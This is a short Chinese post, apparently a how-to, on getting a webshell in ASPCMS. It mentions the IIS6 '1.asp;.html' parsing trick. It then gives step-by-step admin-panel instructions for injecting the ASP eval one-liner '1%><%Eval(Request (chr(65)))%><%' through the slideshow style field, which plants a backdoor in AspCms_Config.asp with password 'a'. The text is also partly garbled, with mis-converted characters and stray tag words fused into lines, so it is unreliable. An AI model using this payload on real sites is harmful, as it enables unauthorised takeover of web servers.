aspcms在老版本中能夠經過添加模板直接添加asp.可是新版的aspcms中已經限制了添加模板的格式爲html,js,css,固然若是是遇到iis6的話仍是能夠經過iis6的解析漏洞把文件名改爲1.asp;.html這樣的格式來拿到shell的.但是若是遇到iis7.5呢?如下是本人本身找到挖掘到的aspcms通殺版本的後臺拿shell方法.
一、進入後臺,「擴展功能」--「幻燈片設置」--」幻燈樣式」css
二、使用chorme的審查元素功能或者firefox的firebug,總之使用能修改當前頁面元素的工具就行了。將對應的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><%html
三、一句話***,密碼a。在/config/AspCms_Config.aspshell
4.ide
管理員漏洞工具